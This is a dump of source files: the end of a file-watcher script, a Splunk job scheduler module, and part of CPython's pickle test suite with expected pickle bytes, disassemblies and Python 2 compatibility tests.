settings.VERBOSE = getattr(x, 'VERBOSE', settings.VERBOSE)
settings.IGNORE_EXTENSIONS = getattr(x, 'IGNORE_EXTENSIONS', tuple())
settings.IGNORE_DIRECTORIES = getattr(x, 'IGNORE_DIRECTORIES', tuple())
settings.RUN_ON_EVERY_EVENT = getattr(x, 'RUN_ON_EVERY_EVENT', False)
actual_directories = configure_more(settings.DIRECTORIES)
sys.exit(start(actual_directories))
|
scheduler.py
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import queue
import random
import threading
from time import time
from splunktalib.common import log
class Scheduler:
"""
A simple scheduler which schedules periodic or one-shot events
"""
import sortedcontainers as sc
max_delay_time = 60
def __init__(self):
self._jobs = Scheduler.sc.SortedSet()
self._wakeup_q = queue.Queue()
self._lock = threading.Lock()
self._thr = threading.Thread(target=self._do_jobs)
self._thr.daemon = True
self._started = False
def start(self):
"""
Start the scheduler, which will start the internal thread for scheduling
jobs. Please call tear_down when doing cleanup.
"""
if self._started:
log.logger.info("Scheduler already started.")
return
self._started = True
self._thr.start()
def tear_down(self):
"""
Stop the scheduler, which will stop the internal thread for scheduling
jobs.
"""
if not self._started:
log.logger.info("Scheduler already tear down.")
return
self._wakeup_q.put(True)
def _do_jobs(self):
while 1:
(sleep_time, jobs) = self.get_ready_jobs()
self._do_execution(jobs)
try:
done = self._wakeup_q.get(timeout=sleep_time)
except queue.Empty:
pass
else:
if done:
break
self._started = False
log.logger.info("Scheduler exited.")
def get_ready_jobs(self):
"""
@return: a 2-element tuple. The first element is the sleep time until the
next job is due. The second element is the list of ready jobs.
"""
now = time()
ready_jobs = []
sleep_time = 1
with self._lock:
job_set = self._jobs
total_jobs = len(job_set)
for job in job_set:
if job.get_expiration() <= now:
ready_jobs.append(job)
if ready_jobs:
del job_set[: len(ready_jobs)]
for job in ready_jobs:
if job.get_interval() != 0 and not job.stopped():
# repeated job, calculate next due time and enqueue
job.update_expiration()
job_set.add(job)
if job_set:
sleep_time = job_set[0].get_expiration() - now
if sleep_time < 0:
log.logger.warn("Scheduler satuation, sleep_time=%s", sleep_time)
sleep_time = 0.1
if ready_jobs:
log.logger.info(
"Get %d ready jobs, next duration is %f, "
"and there are %s jobs scheduling",
len(ready_jobs),
sleep_time,
total_jobs,
)
ready_jobs.sort(key=lambda job: job.get("priority", 0), reverse=True)
return (sleep_time, ready_jobs)
def add_jobs(self, jobs):
with self._lock:
now = time()
job_set = self._jobs
for job in jobs:
delay_time = random.randrange(0, self.max_delay_time)
job.set_initial_due_time(now + delay_time)
job_set.add(job)
self._wakeup()
def update_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
job_set.discard(njob)
job_set.add(njob)
self._wakeup()
def remove_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
njob.stop()
job_set.discard(njob)
self._wakeup()
def number_of_jobs(self):
with self._lock:
return len(self._jobs)
def disable_randomization(self):
self.max_delay_time = 1
def _wakeup(self):
self._wakeup_q.put(None)
def _do_execution(self, jobs):
for job in jobs:
job()
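# Illustrative lifecycle (a sketch, not part of the original module); the job objects
# this scheduler expects come from elsewhere in splunktalib and are assumed here to be
# callables exposing get_expiration / get_interval / update_expiration /
# set_initial_due_time / stop / stopped plus a dict-style get("priority") used to
# order ready jobs:
#
#     scheduler = Scheduler()
#     scheduler.start()
#     scheduler.add_jobs(jobs)   # each job's first run is delayed randomly, up to max_delay_time seconds
#     ...
#     scheduler.tear_down()      # unblocks and stops the internal scheduling thread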
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import os_helper
from test.support import (
TestFailed, run_with_locale, no_tracing,
_2G, _4G, bigmemtest
)
from test.support.import_helper import forget
from test.support.os_helper import TESTFN
from test.support import threading_helper
from test.support.warnings_helper import save_restore_warnings_filters
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
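# e.g. (illustrative sketch of that pattern, assuming the usual self.dumps/self.loads
# helpers defined by the abstract test classes):
#     for proto in protocols:
#         s = self.dumps(obj, proto)
#         self.assertEqual(self.loads(s), obj)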
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
def identity(x):
return x
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
# Simple mutable object.
class Object:
pass
# Hashable immutable key object containing unhashable mutable data.
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
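# A minimal sketch (not exercised by the tests) of how the Python 2 pickles
# above are loaded on Python 3: the fix_imports flag maps 2.x module names
# such as '__builtin__' to their 3.x equivalents, and the encoding argument
# controls how 2.x 8-bit str contents are decoded (encoding='bytes' keeps
# them as bytes objects).
def _load_py2_pickle_sketch(data, encoding="ASCII"):
    """Unpickle Python 2 data using pickle's compatibility arguments."""
    import pickle
    return pickle.loads(data, fix_imports=True, encoding=encoding)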
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
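# A small sketch (not used directly by the tests below) of how the template
# above is meant to be specialized: b'?' is replaced with an exception class
# name, and on Python 3 the unpickler maps the 2.x 'exceptions' module entries
# to the corresponding builtins when fix_imports is true.
def _py2_exception_pickle_sketch(exc_name):
    """Build a protocol 2 pickle of an argument-less Python 2 exception."""
    return exception_pickle.replace(b'?', exc_name.encode('ascii'))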
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests:
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of an old-style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Also try with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
